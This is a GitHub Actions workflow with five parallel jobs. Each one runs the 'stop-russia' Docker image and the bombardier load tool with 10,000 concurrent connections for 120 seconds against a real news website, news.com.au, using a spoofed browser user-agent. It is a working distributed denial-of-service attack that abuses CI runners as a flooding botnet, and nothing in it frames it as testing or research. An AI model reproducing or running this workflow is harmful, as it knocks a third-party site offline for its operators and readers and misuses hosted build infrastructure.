# UA
# "user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"

name: Run Docker Command

on:
  push:
    branches:
      - main
  pull_request:
    branches:
      - main

jobs:
  run-docker-command-1:
    runs-on: ubuntu-latest

    steps:
      - name: Instance 1
        uses: actions/checkout@v3

      - name: Run Docker container inside the action docker
        uses: addnab/docker-run-action@v3
        with:
            image: abagayev/stop-russia:latest
            run: | 
                  export url="https://www.news.com.au"
                  bombardier -c 10000 -d 120s -l -H "user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" $url

  run-docker-command-2:
    runs-on: ubuntu-latest

    steps:
      - name: Instance 2
        uses: actions/checkout@v3

      - name: Run Docker container inside the action docker
        uses: addnab/docker-run-action@v3
        with:
            image: abagayev/stop-russia:latest
            run: |
                  export url="https://www.news.com.au"
                  bombardier -c 10000 -d 120s -l -H "user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" $url

  run-docker-command-3:
    runs-on: ubuntu-latest

    steps:
      - name: Instance 3
        uses: actions/checkout@v3

      - name: Run Docker container inside the action docker
        uses: addnab/docker-run-action@v3
        with:
            image: abagayev/stop-russia:latest
            run: |
                  export url="https://www.news.com.au"
                  bombardier -c 10000 -d 120s -l -H "user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" $url
  run-docker-command-4:
    runs-on: ubuntu-latest

    steps:
      - name: Instance 4
        uses: actions/checkout@v3

      - name: Run Docker container inside the action docker
        uses: addnab/docker-run-action@v3
        with:
            image: abagayev/stop-russia:latest
            run: |
                  export url="https://www.news.com.au"
                  bombardier -c 10000 -d 120s -l -H "user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" $url
  run-docker-command-5:
    runs-on: ubuntu-latest

    steps:
      - name: Instance 5
        uses: actions/checkout@v3

      - name: Run Docker container inside the action docker
        uses: addnab/docker-run-action@v3
        with:
            image: abagayev/stop-russia:latest
            run: |
                  export url="https://www.news.com.au"
                  bombardier -c 10000 -d 120s -l -H "user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" $url